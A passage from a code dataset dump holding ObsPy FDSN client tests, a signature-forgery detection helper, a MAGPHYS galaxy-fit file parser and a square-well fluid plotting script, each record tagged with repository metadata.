endtime=UTCDateTime(\"2001-01-07T01:05:00\"),\n catalog=\"ISC\")\n # Just make sure something is being downloaded.\n assert bool(len(cat))\n\n # Also test the bulk requests which are done using POST requests.\n bulk = ((\"TA\", \"A25A\", \"\", \"BHZ\",\n UTCDateTime(\"2010-03-25T00:00:00\"),\n UTCDateTime(\"2010-03-25T00:00:01\")),\n (\"TA\", \"A25A\", \"\", \"BHE\",\n UTCDateTime(\"2010-03-25T00:00:00\"),\n UTCDateTime(\"2010-03-25T00:00:01\")))\n st = c.get_waveforms_bulk(bulk, quality=\"B\", longestonly=False)\n # Just make sure something is being downloaded.\n assert bool(len(st))\n\n starttime = UTCDateTime(1990, 1, 1)\n endtime = UTCDateTime(1990, 1, 1) + 10\n bulk = [\n [\"IU\", \"ANMO\", \"\", \"BHE\", starttime, endtime],\n [\"IU\", \"CCM\", \"\", \"BHZ\", starttime, endtime],\n ]\n inv = c.get_stations_bulk(bulk, level=\"network\")\n # Just make sure something is being downloaded.\n assert bool(len(inv.networks))\n\n def test_redirection_auth(self):\n \"\"\"\n Tests the redirection of GET and POST requests using authentication.\n\n By default these should not redirect and an exception is raised.\n \"\"\"\n # Clear the cache.\n Client._Client__service_discovery_cache.clear()\n\n # The error will already be raised during the initialization in most\n # cases.\n service_mappings = {\n \"station\": \"http://ds.iris.edu/files/redirect/307/station/1\",\n \"dataselect\": \"http://ds.iris.edu/files/redirect/307/dataselect/1\",\n \"event\": \"http://ds.iris.edu/files/redirect/307/event/1\"}\n with warnings.catch_warnings():\n # ignore warnings about unclosed sockets\n # These occur when raising the FDSNRedirectException, but\n # I was not able to fix it in the code\n 
warnings.filterwarnings('ignore', 'unclosed')\n with pytest.raises(FDSNRedirectException):\n Client(\"IRIS\", service_mappings=service_mappings,\n user=\"nobody@iris.edu\", password=\"anonymous\",\n user_agent=USER_AGENT)\n # The force_redirect flag overwrites that behaviour.\n c_auth = Client(\"IRIS\", service_mappings=service_mappings,\n user=\"nobody@iris.edu\", password=\"anonymous\",\n user_agent=USER_AGENT, force_redirect=True)\n st = c_auth.get_waveforms(\n network=\"IU\", station=\"ANMO\", location=\"00\", channel=\"BHZ\",\n starttime=UTCDateTime(\"2010-02-27T06:30:00.000\"),\n endtime=UTCDateTime(\"2010-02-27T06:30:01.000\"))\n # Just make sure something is being downloaded.\n assert bool(len(st))\n\n inv = c_auth.get_stations(\n starttime=UTCDateTime(\"2000-01-01\"),\n endtime=UTCDateTime(\"2001-01-01\"),\n network=\"IU\", station=\"ANMO\", level=\"network\")\n # Just make sure something is being downloaded.\n assert bool(len(inv.networks))\n\n cat = c_auth.get_events(starttime=UTCDateTime(\"2001-01-07T01:00:00\"),\n endtime=UTCDateTime(\"2001-01-07T01:05:00\"),\n catalog=\"ISC\")\n # Just make sure something is being downloaded.\n assert bool(len(cat))\n\n # Also test the bulk requests which are done using POST requests.\n bulk = ((\"TA\", \"A25A\", \"\", \"BHZ\",\n UTCDateTime(\"2010-03-25T00:00:00\"),\n UTCDateTime(\"2010-03-25T00:00:01\")),\n (\"TA\", \"A25A\", \"\", \"BHE\",\n UTCDateTime(\"2010-03-25T00:00:00\"),\n UTCDateTime(\"2010-03-25T00:00:01\")))\n st = c_auth.get_waveforms_bulk(bulk, quality=\"B\", longestonly=False)\n # Just make sure something is being downloaded.\n assert bool(len(st))\n\n starttime = UTCDateTime(1990, 1, 1)\n endtime = UTCDateTime(1990, 1, 1) + 10\n bulk = [\n [\"IU\", \"ANMO\", \"\", \"BHE\", starttime, endtime],\n [\"IU\", \"CCM\", \"\", \"BHZ\", starttime, endtime],\n ]\n inv = c_auth.get_stations_bulk(bulk, level=\"network\")\n # Just make sure something is being downloaded.\n assert bool(len(inv.networks))\n\n def test_get_waveforms_empty_seed_codes(self):\n \"\"\"\n Make sure that network, station, and channel codes specified as empty\n strings are not omitted in `get_waveforms(...)` when building the url\n (which results in default values '*' (wildcards) at the server,\n see #1578).\n \"\"\"\n t = UTCDateTime(2000, 1, 1)\n url_base = \"http://service.iris.edu/fdsnws/dataselect/1/query?\"\n kwargs = dict(network='IU', station='ANMO', location='00',\n channel='HHZ', starttime=t, endtime=t)\n\n for key in ('network', 'station', 'channel'):\n kwargs_ = kwargs.copy()\n # set empty SEED code for given key\n kwargs_.update(((key, ''),))\n\n # use a mock object and check what URL would have been downloaded\n with mock.patch.object(\n self.client, '_download') as m:\n try:\n self.client.get_waveforms(**kwargs_)\n except Exception:\n # Mocking returns something different.\n continue\n # URL downloading comes before the error and can be checked now\n url = m.call_args[0][0]\n url_parts = url.replace(url_base, '').split(\"&\")\n assert '{}='.format(key) in url_parts\n\n @mock.patch(\"obspy.clients.fdsn.client.download_url\")\n def test_no_data_exception(self, download_url_mock):\n \"\"\"\n Verify that a request returning no data raises an identifiable\n exception\n \"\"\"\n download_url_mock.return_value = (204, None)\n with pytest.raises(FDSNNoDataException):\n self.client.get_stations()\n\n @mock.patch(\"obspy.clients.fdsn.client.download_url\")\n def test_request_too_large_exception(self, download_url_mock):\n \"\"\"\n Verify that a request 
returning too much data raises an identifiable\n exception\n \"\"\"\n download_url_mock.return_value = (413, None)\n with pytest.raises(FDSNRequestTooLargeException):\n self.client.get_stations()\n\n @mock.patch(\"obspy.clients.fdsn.client.download_url\")\n def test_authentication_exceptions(self, download_url_mock):\n \"\"\"\n Verify that a request with missing authentication raises an\n identifiable exception\n \"\"\"\n with mock.patch(\"obspy.clients.fdsn.client.Client._has_eida_auth\",\n new_callable=mock.PropertyMock,\n return_value=False):\n with pytest.raises(FDSNNoAuthenticationServiceException):\n Client(eida_token=\"TEST\")\n\n with pytest.raises(FDSNDoubleAuthenticationException):\n Client(\"IRIS\", eida_token=\"TEST\", user=\"TEST\")\n\n download_url_mock.return_value = (401, None)\n with pytest.raises(FDSNUnauthorizedException):\n self.client.get_stations()\n\n download_url_mock.return_value = (403, None)\n with pytest.raises(FDSNForbiddenException):\n self.client.get_stations()\n\n @mock.patch(\"obspy.clients.fdsn.client.download_url\")\n def test_timeout_exception(self, download_url_mock):\n \"\"\"\n Verify that a request timing out raises an identifiable exception\n \"\"\"\n download_url_mock.return_value = (None, \"timeout\")\n with pytest.raises(FDSNTimeoutException):\n self.client.get_stations()\n\n def test_no_service_exception(self):\n \"\"\"\n Verify that opening a client to a provider without FDSN service raises\n an identifiable exception\n \"\"\"\n with pytest.raises(FDSNNoServiceException):\n Client(\"http://nofdsnservice.org\")\n\n @mock.patch(\"obspy.clients.fdsn.client.download_url\")\n def test_not_implemented_exception(self, download_url_mock):\n \"\"\"\n Verify that a client receiving a 501 'Not Implemented' status\n raises an identifiable exception\n \"\"\"\n download_url_mock.return_value = (501, None)\n with pytest.raises(FDSNNotImplementedException):\n self.client.get_stations()\n\n @mock.patch(\"obspy.clients.fdsn.client.download_url\")\n def test_bad_gateway_exception(self, download_url_mock):\n \"\"\"\n Verify that a client receiving a 502 'Bad Gateway' status\n raises an identifiable exception\n \"\"\"\n download_url_mock.return_value = (502, None)\n with pytest.raises(FDSNBadGatewayException):\n self.client.get_stations()\n\n @mock.patch(\"obspy.clients.fdsn.client.download_url\")\n def test_service_unavailable_exception(self, download_url_mock):\n \"\"\"\n Verify that opening a client to a service temporarily unavailable\n raises an identifiable exception\n \"\"\"\n download_url_mock.return_value = (503, None)\n with pytest.raises(FDSNServiceUnavailableException):\n self.client.get_stations()\n\n @mock.patch(\"obspy.clients.fdsn.client.download_url\")\n def test_bad_request_exception(self, download_url_mock):\n \"\"\"\n Verify that a bad request raises an identifiable exception\n \"\"\"\n download_url_mock.return_value = (400, io.BytesIO(b\"\"))\n with pytest.raises(FDSNBadRequestException):\n self.client.get_stations()\n\n @mock.patch(\"obspy.clients.fdsn.client.download_url\")\n def test_server_exception(self, download_url_mock):\n \"\"\"\n Verify that a server error raises an identifiable exception\n \"\"\"\n download_url_mock.return_value = (500, None)\n with pytest.raises(FDSNInternalServerException):\n self.client.get_stations()\n\n @mock.patch(\"obspy.clients.fdsn.client.download_url\")\n def test_too_many_requests_exception(self, download_url_mock):\n \"\"\"\n Verify that too many requests raise an identifiable exception\n \"\"\"\n 
download_url_mock.return_value = (429, None)\n with pytest.raises(FDSNTooManyRequestsException):\n self.client.get_stations()\n\n @pytest.mark.skip(reason='Token is expired')\n def test_eida_token_resolution(self, testdata):\n \"\"\"\n Tests that EIDA tokens are resolved correctly and new credentials get\n installed with the opener of the Client.\n \"\"\"\n token = testdata['eida_token.txt']\n with open(token, 'rb') as fh:\n token_data = fh.read().decode()\n\n def _assert_eida_user_and_password(user, password):\n # user/pass is not static for the static test token\n for value in user, password:\n # seems safe to assume both user and password are at least 10\n # chars long\n # example user/password:\n # wWGgJnH4GvdVY7gDMH21xEpb wDnzlpljqdaCXlP2\n re.match('^[a-zA-Z0-9]{10,}$', value)\n\n def _get_http_digest_auth_handler(client):\n handlers = [h for h in client._url_opener.handlers\n if isinstance(h, urllib_request.HTTPDigestAuthHandler)]\n assert len(handlers) <= 1\n return handlers and handlers[0] or None\n\n def _assert_credentials(client, user, password):\n handler = _get_http_digest_auth_handler(client)\n assert isinstance(handler, urllib_request.HTTPDigestAuthHandler)\n for user_, password_ in handler.passwd.passwd[None].values():\n assert user == user_\n assert password == password_\n\n client = Client('GFZ')\n # this is a plain client, so it should not have http digest auth\n assert _get_http_digest_auth_handler(client) is None\n # now, if we set new user/password, we should get a http digest auth\n # handler\n user, password = (\"spam\", \"eggs\")\n client._set_opener(user=user, password=password)\n _assert_credentials(client, user, password)\n # now, if we resolve the EIDA token, the http digest auth handler\n # should change\n user, password = client._resolve_eida_token(token=token)\n _assert_eida_user_and_password(user, password)\n client._set_opener(user=user, password=password)\n _assert_credentials(client, user, password)\n # do it again, now providing the token data directly as a string (first\n # change the authentication again to dummy user/password\n client._set_opener(user=\"foo\", password=\"bar\")\n _assert_credentials(client, \"foo\", \"bar\")\n user, password = client._resolve_eida_token(token=token_data)\n _assert_eida_user_and_password(user, password)\n client.set_eida_token(token_data)\n _assert_credentials(client, user, password)\n\n # Raise if token and user/pw are given.\n msg = \"EIDA authentication token provided, but user and password \" \\\n \"are also given.\"\n with pytest.raises(FDSNException, match=msg):\n Client('GFZ', eida_token=token, user=\"foo\", password=\"bar\")\n\n # now lets test the RoutingClient with credentials..\n credentials_ = {'geofon.gfz-potsdam.de': {'eida_token': token}}\n credentials_mapping_ = {'GFZ': {'eida_token': token}}\n global_eida_credentials_ = {'EIDA_TOKEN': token}\n for credentials, should_have_credentials in zip(\n (None, credentials_, credentials_mapping_,\n global_eida_credentials_), (False, True, True, True)):\n def side_effect(self_, *args, **kwargs):\n \"\"\"\n This mocks out Client.get_waveforms_bulk which gets called by\n the routing client, checks authentication handlers and returns\n a dummy stream.\n \"\"\"\n # check that we're at the expected FDSN WS server\n assert 'http://geofon.gfz-potsdam.de' == self_.base_url\n # check if credentials were used\n # eida auth availability should be positive in all cases\n assert self_._has_eida_auth\n # depending on whether we specified credentials, the\n # underlying FDSN 
client should have EIDA authentication\n # flag and should also have a HTTP digest handler with\n # appropriate user/password\n handler = _get_http_digest_auth_handler(self_)\n if should_have_credentials:\n for user, password in handler.passwd.passwd[None].values():\n _assert_eida_user_and_password(user, password)\n else:\n assert handler is None\n # just always return some dummy stream, we're not\n # interested in checking the data downloading which\n # succeeds regardless if auth is used or not as it's public\n # data\n return Stream([Trace(data=np.ones(2))])\n\n with mock.patch(\n 'obspy.clients.fdsn.client.Client.get_waveforms_bulk',\n autospec=True) as p:\n\n p.side_effect = side_effect\n\n routing_client = RoutingClient('eida-routing',\n credentials=credentials)\n # do a waveform request on the routing client which internally\n # connects to the GFZ FDSNWS. this should be done using the\n # above supplied credentials, i.e. should use the given EIDA\n # token to resolve user/password for the normal FDSN queryauth\n # mechanism\n routing_client.get_waveforms(\n network=\"GE\", station=\"KMBO\", location=\"00\", channel=\"BHZ\",\n starttime=UTCDateTime(\"2010-02-27T06:30:00.000\"),\n endtime=UTCDateTime(\"2010-02-27T06:40:00.000\"))\n\n # test invalid token/token file\n with pytest.raises(\n ValueError,\n match='EIDA token does not seem to be a valid PGP message'):\n client = Client('GFZ', eida_token=\"spam\")\n msg = (\"Read EIDA token from file '[^']*event_helpstring.txt' but it \"\n \"does not seem to contain a valid PGP message.\")\n with pytest.raises(ValueError, match=msg):\n client = Client('GFZ', eida_token=testdata['event_helpstring.txt'])\n","repo_name":"obspy/obspy","sub_path":"obspy/clients/fdsn/tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":72072,"program_lang":"python","lang":"en","doc_type":"code","stars":1088,"dataset":"github-code","pt":"92"} +{"seq_id":"19616389009","text":"import numpy as np\nfrom tensorflow.keras.preprocessing.image import load_img, img_to_array\nfrom solutions import similarity_model, distinction_model\n\n# Load the similarity model and its pre-trained weights\nsim_model = similarity_model.get_similarity_model()\nsim_model.load_weights(\n \"/home/anshal/Projects/Signature-Forgery-Detection/models/similarity/signet_english_v3.h5\"\n)\n\n# Load the distinction model and its pre-trained weights\ndis_model = distinction_model.get_disiction_model()\ndis_model.load_weights(\n \"/home/anshal/Projects/Signature-Forgery-Detection/models/distinction/signet_v4.h5\"\n)\n\n\ndef load_and_preprocess_image(\n image_path: str, target_size: tuple = (155, 220), color_mode: str = \"grayscale\"\n):\n \"\"\"\n Load and preprocess an image.\n\n Args:\n image_path (str): The path to the image file.\n target_size (tuple): The target size (height, width) for resizing the image.\n color_mode (str): The color mode for loading the image ('grayscale' or 'rgb').\n\n Returns:\n tuple: A tuple containing a preprocessed image as a NumPy array and the original PIL image object.\n \"\"\"\n # Load the image as a PIL image object\n img = load_img(image_path, target_size=target_size, color_mode=color_mode)\n\n # Convert the image to a NumPy array and scale it\n img_array = img_to_array(img) / 255.0\n\n # Add a dimension to mimic the batch size\n img_array = np.expand_dims(img_array, axis=0)\n\n return img_array, img\n\n\ndef predict_function(image1, image2, threshold: int = 30, use_cross: bool = True):\n \"\"\"\n Predict whether two images 
represent real or fake signatures.\n\n Args:\n image1 (numpy.ndarray): The preprocessed image data for the first image.\n image2 (numpy.ndarray): The preprocessed image data for the second image.\n threshold (int): The threshold for classifying the images (default is 30).\n use_cross (bool): Whether to use cross-checking with the distinction model (default is True).\n\n Returns:\n str: A string indicating the prediction result.\n \"\"\"\n if use_cross:\n initial_pred = dis_model.predict([image1, image2])\n init_res, similarity = match_results(initial_pred, threshold=threshold)\n print(\"First Check: \", init_res)\n if similarity <= 70:\n return init_res\n\n prediction = sim_model.predict([image1, image2])\n res, _ = match_results(prediction, threshold=threshold)\n\n print(\"Second Check: \", res)\n\n return res\n\n\ndef match_results(prediction: np.ndarray, threshold: int = 30) -> tuple:\n \"\"\"\n Match and classify images based on a prediction.\n\n Args:\n prediction (numpy.ndarray): The prediction result.\n threshold (int): The threshold for classifying the images (default is 30).\n\n Returns:\n tuple: A tuple containing the classification result as a string and the similarity score.\n \"\"\"\n res = \"UNK\"\n similarity = max((1 - prediction[0][0]) * 100, 0)\n\n if prediction[0][0] * 100 < threshold:\n res = f\"Real signature. Similarity = {(similarity):.2f}%, Distance = {prediction[0][0]:.4f}\"\n else:\n res = f\"Fake signature. Similarity = {similarity:.2f}%\"\n\n return res, similarity\n","repo_name":"Anshal55/Signature-Forgery-Detection","sub_path":"solutions/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"855680714","text":"import logging\n\nLOG = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.INFO, format='%(asctime)-15s:' + logging.BASIC_FORMAT)\n\n\nclass Galaxy(object):\n def __init__(self):\n self.gama_id = None\n self.redshift = None\n self.i_sfh = None\n self.i_ir = None\n self.chi2 = None\n\n\nclass FilterValue(object):\n def __init__(self):\n self.filter_id = None\n self.flux = None\n self.sigma = None\n self.flux_bfm = None\n\n\nclass Result(object):\n def __init__(self):\n self.parameter_name_id = None\n self.best_fit = None\n self.percentile2_5 = None\n self.percentile16 = None\n self.percentile50 = None\n self.percentile84 = None\n self.percentile97_5 = None\n\n\nclass ProcessMagphysFile(object):\n def __init__(self, map_filter_in, map_parameter_name_in):\n # Load the filters\n self._map_filter = map_filter_in\n\n # Load the parameter name map\n self._map_parameter_name = map_parameter_name_in\n\n def process_file(self, gama_id, filename):\n \"\"\"\n Process a file\n \"\"\"\n # Reset a lot of the variables\n line = None\n line_number = 0\n list_filters = []\n list_filter_values = []\n map_results = {}\n parameter_name = None\n percentiles_next = False\n galaxy = Galaxy()\n galaxy.gama_id = gama_id\n for key in self._map_parameter_name.keys():\n result = Result()\n result.parameter_name_id = self._map_parameter_name[key]\n map_results[key] = result\n try:\n with open(filename) as f:\n for line in f:\n line_number += 1\n\n if line_number == 2:\n filter_names = line.split()\n list_filters = filter_names[1:]\n\n elif line_number == 3:\n fluxes = line.split()\n i = 0\n for flux in fluxes:\n filter_value = FilterValue()\n filter_name = list_filters[i]\n filter_value.filter_id = self._map_filter[filter_name]\n 
filter_value.flux = flux\n list_filter_values.append(filter_value)\n i += 1\n\n elif line_number == 4:\n sigmas = line.split()\n i = 0\n for sigma in sigmas:\n filter_value = list_filter_values[i]\n filter_value.sigma = sigma\n i += 1\n\n elif line_number == 9:\n best_fit = line.split()\n if len(best_fit) == 4:\n galaxy.i_sfh = best_fit[0]\n galaxy.i_ir = best_fit[1]\n galaxy.chi2 = best_fit[2]\n galaxy.redshift = best_fit[3]\n else:\n galaxy.i_sfh = 0\n galaxy.i_ir = 0\n galaxy.chi2 = 0\n galaxy.redshift = 0\n LOG.warning('Only {0} arguments from line: {1}'.format(len(best_fit), line))\n if len(best_fit) == 3 and best_fit[1].startswith('0') and best_fit[1].endswith('*'):\n galaxy.i_sfh = best_fit[0]\n galaxy.i_ir = 0\n galaxy.chi2 = 0\n galaxy.redshift = best_fit[2]\n elif line_number == 11:\n best_fits = line.split()\n map_results['f_mu (SFH)'].best_fit = best_fits[0]\n map_results['f_mu (IR)'].best_fit = best_fits[1]\n map_results['mu parameter'].best_fit = best_fits[2]\n map_results['tau_V'].best_fit = best_fits[3]\n map_results['sSFR_0.1Gyr'].best_fit = best_fits[4]\n map_results['M(stars)'].best_fit = best_fits[5]\n map_results['Ldust'].best_fit = best_fits[6]\n map_results['T_W^BC'].best_fit = best_fits[7]\n map_results['T_C^ISM'].best_fit = best_fits[8]\n map_results['xi_C^tot'].best_fit = best_fits[9]\n map_results['xi_PAH^tot'].best_fit = best_fits[10]\n map_results['xi_MIR^tot'].best_fit = best_fits[11]\n map_results['xi_W^tot'].best_fit = best_fits[12]\n map_results['tau_V^ISM'].best_fit = best_fits[13]\n map_results['M(dust)'].best_fit = best_fits[14]\n map_results['SFR_0.1Gyr'].best_fit = best_fits[15]\n\n elif line_number == 13:\n bfms = line.split()\n i = 0\n for bfm in bfms:\n filter_value = list_filter_values[i]\n filter_value.flux_bfm = bfm\n i += 1\n\n elif line_number >= 16:\n if line.startswith(\"# ...\"):\n parts = line.split('...')\n parameter_name = parts[1].strip()\n\n elif line.startswith(\"#....percentiles of the PDF......\"):\n percentiles_next = True\n\n elif percentiles_next:\n values = line.split()\n result = map_results[parameter_name]\n result.percentile2_5 = values[0]\n result.percentile16 = values[1]\n result.percentile50 = values[2]\n result.percentile84 = values[3]\n result.percentile97_5 = values[4]\n percentiles_next = False\n\n except:\n LOG.exception('''Exception after {0} lines\n{1}'''.format(line_number, line))\n\n return galaxy, list_filter_values, map_results\n\n\nif __name__ == \"__main__\":\n map_filter = {\n 'fuv': 0,\n 'nuv': 1,\n 'u': 2,\n 'g': 3,\n 'r': 4,\n 'i': 5,\n 'Z': 6,\n 'Y': 7,\n 'J': 8,\n 'H': 9,\n 'K': 10,\n 'WISEW1': 11,\n 'WISEW2': 12,\n 'WISEW3': 13,\n 'WISEW4': 14,\n 'PACS100': 15,\n 'PACS160': 16,\n 'SPIRE250': 17,\n 'SPIRE350': 18,\n 'SPIRE500': 19,\n }\n map_parameter_name = {\n 'f_mu (SFH)': 0,\n 'f_mu (IR)': 1,\n 'mu parameter': 2,\n 'tau_V': 3,\n 'sSFR_0.1Gyr': 4,\n 'M(stars)': 5,\n 'Ldust': 6,\n 'T_C^ISM': 7,\n 'T_W^BC': 8,\n 'xi_C^tot': 9,\n 'xi_PAH^tot': 10,\n 'xi_MIR^tot': 11,\n 'xi_W^tot': 12,\n 'tau_V^ISM': 13,\n 'M(dust)': 14,\n 'SFR_0.1Gyr': 15,\n 'metalicity Z/Zo': 16,\n 'tform': 17,\n 'gamma': 18,\n 'tlastb': 19,\n 'agem': 20,\n 'ager': 21,\n 'sfr16': 22,\n 'sfr17': 23,\n 'sfr18': 24,\n 'sfr19': 25,\n 'sfr29': 26,\n 'fb16': 27,\n 'fb17': 28,\n 'fb18': 29,\n 'fb19': 30,\n 'fb29': 31,\n }\n # ProcessMagphysFile expects the filter map first, then the parameter-name\n # map (see __init__); the original call passed them in the wrong order.\n process_magphys = ProcessMagphysFile(map_filter, map_parameter_name)\n process_magphys.process_file('00343593', '../data/00343593.f')\n process_magphys.process_file('00861737', 
'../data/00861737.f')\n","repo_name":"ICRAR/gama-magphys","sub_path":"src/process_magphys_file.py","file_name":"process_magphys_file.py","file_ext":"py","file_size_in_byte":7720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"73880767020","text":"from __future__ import division\nimport numpy as np\nimport sys\nimport matplotlib as mpl\nimport SW\nimport pylab as plt\n\n\n\nfrom matplotlib.path import Path\nfrom matplotlib.patches import PathPatch\n\ndata=np.loadtxt('figs/snaft2.out')\n\nx = plt.linspace(1e-20,.17,40000) # x-axis grid space (used for when plotting number density on x-axis)\n\nxmin=((4*np.pi*(SW.R)**3)/3)*1e-20\nxmax=((4*np.pi*(SW.R)**3)/3)*.17\n#xmin=(3/(4.0*np.pi))*(1e-20)*(1/(SW.R)**3)\n#xmax=(3/(4.0*np.pi))*(0.2)*(1/(SW.R)**3)\nxff = plt.linspace(xmin,xmax,40000)\n\n\n\n\n\n\n\n\nnL = [data[i][1] for i in range(0,len(data))] # list of the left number density solutions obtained from fsolve\nnR = [data[i][2] for i in range(0,len(data))] # list of the right number density solutions obtained from fsolve\nTlist = [data[i][0] for i in range(0,len(data))] # list of the corresponding temperatures for which the above number densitites were found\n\nffL = [i*((4*np.pi*(SW.R)**3)/3) for i in nL] # converts left number density to filling fraction\nffR = [i*((4*np.pi*(SW.R)**3)/3) for i in nR] # converts right number density to filling fraction\n\n\n\ndef liq_vap_Tvsff():\n plt.figure()\n plt.plot(ffL,Tlist,color='#f36118',linewidth=2)\n plt.plot(ffR,Tlist,color='c',linewidth=2)\n plt.xlabel(r'$filling fraction$')\n plt.ylabel(r'$temperature$')\n plt.xlim(-.05,max(ffR)+.05)\n plt.title('liquid-vapor coexistence '+r'$\\lambda_{SW}=1.5$')\n #plt.savefig('figs/liqVapCo_Tvsff.pdf')\n\n\n plt.figure()\n plt.plot(ffL,Tlist,color='#f36118',linewidth=2)\n plt.plot(ffR,Tlist,color='c',linewidth=2)\n plt.xlabel(r'$filling fraction$')\n plt.ylabel(r'$temperature$')\n plt.xlim(-.05,max(ffR)+.05)\n plt.title('liquid-vapor coexistence '+r'$\\lambda_{SW}=1.5$')\n fig=plt.figure(figsize=(1,5))\n ax=fig.add_subplot(111)\n ax.axis([0,1,-50,200])\n cmap = mpl.cm.jet\n norm = mpl.colors.Normalize(vmin=-40, vmax=180)\n cb1 = mpl.colorbar.ColorbarBase(ax, cmap=cmap,\n orientation='vertical', \n norm=norm,\n ticks=[-40,180]\n )\n\n plt.subplots_adjust(left=0.4, right=0.8)\n \n #plt.savefig('figs/liqVapCo_Tvsff2.pdf')\n \n\n plt.figure()\n xx=np.arange(0,10,0.01)\n yy=xx*np.exp(-xx)\n\n path = Path(np.array([xx,yy]).transpose())\n patch = PathPatch(path, facecolor='none')\n plt.gca().add_patch(patch)\n\n im = plt.imshow(xx.reshape(yy.size,1), cmap=plt.cm.Reds,interpolation=\"bicubic\",\n origin='lower',extent=[0,10,-0.0,0.40],aspect=\"auto\", clip_path=patch, clip_on=True)\n #im.set_clip_path(patch)\n #plt.savefig(\"out.png\")\n\n plt.show()\n\n\n\n \n\ndef liq_vap_co_pvsT():\n pL=[]\n pR=[]\n pdiff=[]\n for i in range(0,len(nL)):\n pL.append(SW.findP(Tlist[i],nL[i]))\n pR.append(SW.findP(Tlist[i],nR[i]))\n pdiff.append(pL[i]-pR[i])\n plt.figure()\n plt.title('liquid-vapor coexistence '+r'$\\lambda_{SW}=1.5$')\n plt.ylabel('pressure')\n plt.xlabel('temperature')\n plt.plot(Tlist,pL,color='#f36118',linewidth=8)\n plt.plot(Tlist,pR,'c',linewidth=3)\n plt.savefig('figs/liqVapCo_pvsT.pdf')\n #plt.show()\n \n #plt.figure()\n #plt.title('Pressure check')\n #plt.ylabel('P')\n #plt.xlabel('T')\n #plt.plot(Tlist,pdiff,'r')\n #plt.savefig('figs/liqVapCo_pvsT_diff.pdf')\n\n\ndef cotangent_t0():\n plt.figure()\n plt.title('Helmholtz energy per volume VS ff 
@ T=%0.4f'%Tlist[100])\n plt.ylabel('Helmholtz free energy per volume')\n plt.xlabel('filling fraction')\n plt.plot(xff,SW.ftot(Tlist[100],x),color='#f36118',linewidth=3)\n plt.plot(xff, SW.numH_dftot_dn(Tlist[100],nR[100])*(x-nR[100])+SW.ftot(Tlist[100],nR[100]),color='#00c0c0',linewidth=2)\n #plt.plot(nL[100],SW.ftot(Tlist[100],nL[100]),'ko')\n #plt.plot(nR[100],SW.ftot(Tlist[100],nR[100]),'ko')\n plt.plot(nL[100]*((4*np.pi*(SW.R)**3)/3),SW.ftot(Tlist[100],nL[100]),'ko')\n plt.plot(nR[100]*((4*np.pi*(SW.R)**3)/3),SW.ftot(Tlist[100],nR[100]),'ko')\n plt.savefig('figs/hfe_cotangent.pdf')\n #plt.show()\n\n\ndef gfe():\n x2=plt.linspace(1e-20,.12,40000)\n mu=SW.numH_dftot_dn(Tlist[100],nR[100])\n plt.figure()\n plt.title('Grand free energy per volume vs n@ T=%0.4f'%Tlist[100])\n plt.ylabel('Grand free energy per volume')\n plt.xlabel('number density (n)') \n plt.plot(x2,SW.ftot(Tlist[100],x2)-mu*x2,color='#f36118')\n plt.plot(x2,SW.numH_dftot_dn(Tlist[100],nR[100])*(x2-nR[100])+SW.ftot(Tlist[100],nR[100])-mu*nR[100],'c')\n plt.plot(nL[100],SW.ftot(Tlist[100],nL[100])-mu*nR[100],'ko')\n plt.plot(nR[100],SW.ftot(Tlist[100],nR[100])-mu*nR[100],'ko')\n plt.show()\n\n\ndef gfe2():\n x2=plt.linspace(1e-20,.12,40000)\n mu=SW.numH_dftot_dn(Tlist[100],nR[100])*(x2-nR[100])+SW.ftot(Tlist[100],nR[100])\n plt.figure()\n plt.title('Grand free energy per volume vs n@ T=%0.4f'%Tlist[100])\n plt.ylabel('Grand free energy per volume')\n plt.xlabel('number density (n)') \n plt.plot(x2,SW.ftot(Tlist[100],x2)-mu,color='#f36118')\n plt.plot(x2,x2-x2,'c')\n plt.plot(nL[100],0,'ko')\n plt.plot(nR[100],0,'ko')\n \n #plt.savefig('figs/gfe2.pdf')\n plt.show()\n \ndef gfe3():\n x2=plt.linspace(1e-20,.2,40000)\n mu=SW.numH_dftot_dn(Tlist[100],x2)\n plt.figure()\n plt.title('Grand free energy per volume vs n@ T=%0.4f'%Tlist[100])\n plt.ylabel('Grand free energy per volume')\n plt.xlabel('number density (n)') \n plt.plot(x2,SW.ftot(Tlist[100],x2)-mu*nR[100],color='#f36118')\n plt.plot(x2,x2-x2,'c')\n plt.plot(nL[100],0,'ko')\n plt.plot(nR[100],0,'ko')\n plt.show()\n\n\ndef gfe4():\n x2=plt.linspace(1e-20,.13,90000)\n xmin2=((4*np.pi*(SW.R)**3)/3)*1e-20\n xmax2=((4*np.pi*(SW.R)**3)/3)*.13\n xff2 = plt.linspace(xmin2,xmax2,90000)\n thigh=100\n plt.figure()\n plt.title('Grand free energy per volume vs ff @ T=%0.4f'%Tlist[thigh])\n plt.ylabel('Grand free energy per volume')\n plt.xlabel('filling fraction') \n plt.plot(xff2,SW.phi(Tlist[thigh],x2,nR[thigh]),color='#f36118',linewidth=3)\n #plt.axvline(nL[thigh])\n #plt.axvline(nR[thigh])\n #plt.axhline(SW.phi(Tlist[thigh],nR[thigh]))\n #plt.plot(x2,x2-x2,'c')\n plt.plot(nL[thigh]*((4*np.pi*(SW.R)**3)/3),SW.phi(Tlist[thigh],nL[thigh],nR[thigh]),'ko')\n plt.plot(nR[thigh]*((4*np.pi*(SW.R)**3)/3),SW.phi(Tlist[thigh],nR[thigh],nR[thigh]),'ko')\n plt.axhline(SW.phi(Tlist[thigh],nR[thigh],nR[thigh]),color='c',linewidth=2)\n print(Tlist[100])\n print(nL[100],nR[100])\n plt.savefig('figs/gfe_cotangent.pdf')\n\n plt.figure()\n plt.plot(xff2,SW.phi(Tlist[thigh],x2,nR[thigh]),color='#f36118',linewidth=3)\n plt.plot(nL[thigh]*((4*np.pi*(SW.R)**3)/3),SW.phi(Tlist[thigh],nL[thigh],nR[thigh]),'ko')\n plt.plot(nR[thigh]*((4*np.pi*(SW.R)**3)/3),SW.phi(Tlist[thigh],nR[thigh],nR[thigh]),'ko')\n plt.axhline(SW.phi(Tlist[thigh],nR[thigh],nR[thigh]),color='c',linewidth=2)\n plt.xlim(0,0.0003)\n plt.ylim(-.000014,0.000006)\n print(Tlist[100])\n print(nL[100],nR[100])\n plt.savefig('figs/gfe_insert_cotangent.pdf')\n \n #plt.show()\n\n\ndef ideal():\n x2=plt.linspace(1e-20,.13,40000)\n 